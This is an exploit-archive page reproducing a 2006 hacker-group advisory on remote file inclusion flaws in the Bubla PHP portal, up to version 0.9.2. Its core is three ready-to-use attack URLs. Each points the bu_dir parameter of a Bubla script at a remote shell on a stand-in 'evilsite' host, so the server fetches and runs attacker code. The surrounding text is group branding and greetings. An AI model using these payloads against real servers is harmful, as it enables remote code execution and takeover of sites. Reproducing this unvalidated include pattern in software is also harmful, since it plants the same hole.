[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities
# Published : 2006-12-31
# Author : DeltahackingTEAM
# Previous Title : MDForum <= 2.0.1 (PNSVlang) Remote Code Execution Exploit
# Next Title : x-news 1.1 (users.txt) Remote Password Disclosure Vulnerability
**********************************************************************************************************
DeltasecurityTEAM
WwW.Deltasecurity.iR
**********************************************************************************************************
* Portal Name = Bubla 0.9.1
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Davood_Cracker
* Conatact = Davood_cracker@yahoo.com
* 128 Bit Security Server= www.takserver.ir
* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
- Exploit:
http://localhost/[PATH]/bu/bu_claro.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_cache.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_parse.php?bu_dir=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc
SP TNX : Dr.Pantagon
**********************************************************************************************************
# www.Syue.com [2006-12-31]